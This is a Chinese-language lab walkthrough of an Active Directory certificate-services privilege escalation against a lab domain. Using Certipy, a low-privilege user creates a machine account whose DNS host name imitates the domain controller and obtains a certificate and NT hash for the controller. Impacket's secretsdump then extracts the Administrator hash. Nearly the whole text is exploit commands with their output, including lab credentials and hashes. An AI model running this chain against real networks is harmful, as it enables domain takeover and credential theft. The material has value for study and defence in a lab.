环境
| IP | 机器名 | 说明 | | ———— | —— | —- | | 10.10.10.146 | DC | 域控 | | 10.10.10.145| CS | 证书服务器 s-CS-CA| | 10.10.10.135 | kali | 攻击机 |
- /etc/hosts(攻击机)
1 2 3 4 5
10.10.10.146 dc 10.10.10.146 dc.s.com 10.10.10.145 cs 10.10.10.145 cs.s.com 10.10.10.145 s-CS-CA
利用过程
生成证书
首先使用用户证书模板为我们的低权限域用户 (chenqi:Cqadmin@123) 生成证书 https://github.com/ly4k/Certipy
1
certipy req -u chenqi@s.com -p 'Cqadmin@123' -ca s-CS-CA -template User -dc-ip 10.10.10.146 -target 10.10.10.145
- 验证证书是否有效 ``` certipy auth -pfx chenqi.pfx -dc-ip 10.10.10.146 -debug Certipy v4.3.0 - by Oliver Lyak (ly4k)
[] Using principal: chenqi@s.com [] Trying to get TGT… [] Got TGT [] Saved credential cache to ‘chenqi.ccache’ [] Trying to retrieve NT hash for ‘chenqi’ [] Got hash for ‘chenqi@s.com’: aad3b435b51404eeaad3b435b51404ee:9b60fc74a64a405abacbf9803e700418
1
2
### 创建机器用户
使用LDAPS方法创建计算机,使用SAMR协议创建机器用户时,机器用户默认没有dnsHostName属性和UPN属性
//设置创建的计算机的dns为域控机器名 certipy account create -u chenqi@s.com -p ‘Cqadmin@123’ -dc-ip 10.10.10.146 -user newcomputer -dns DC.s.com Certipy v4.3.0 - by Oliver Lyak (ly4k)
[] Creating new account: sAMAccountName : newcomputer$ unicodePwd : 9Qo3NQ8ItahV5FUT userAccountControl : 4096 servicePrincipalName : HOST/newcomputer RestrictedKrbHost/newcomputer dnsHostName : DC.s.com [] Successfully created account ‘newcomputer$’ with password ‘9Qo3NQ8ItahV5FUT’
1
### 生成创建的机器请求证书
certipy req -u newcomputer$@s.com -p 9Qo3NQ8ItahV5FUT -dc-ip 10.10.10.146 -ca s-CS-CA -target 10.10.10.145 -template Machine -debug Certipy v4.3.0 - by Oliver Lyak (ly4k)
[+] Generating RSA key [] Requesting certificate via RPC [+] Trying to connect to endpoint: ncacn_np:10.10.10.145[\pipe\cert] [+] Connected to endpoint: ncacn_np:10.10.10.145[\pipe\cert] [] Successfully requested certificate [] Request ID is 30 [] Got certificate with DNS Host Name ‘DC.s.com’ [] Certificate has no object SID [] Saved certificate and private key to ‘dc.pfx’
1
### 认证域控
certipy auth -pfx dc.pfx -dc-ip 10.10.10.146 Certipy v4.3.0 - by Oliver Lyak (ly4k)
[] Using principal: dc$@s.com [] Trying to get TGT… [] Got TGT [] Saved credential cache to ‘dc.ccache’ [] Trying to retrieve NT hash for ‘dc$’ [] Got hash for ‘dc$@s.com’: aad3b435b51404eeaad3b435b51404ee:802e8ec76f455c3fb0377ebd3961bd1e
1
### 导出域内任意用户哈希
secretsdump.py -hashes 1:802e8ec76f455c3fb0377ebd3961bd1e s.com/DC$@10.10.10.146 -just-dc-user administrator Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4::: [*] Cleaning up… ```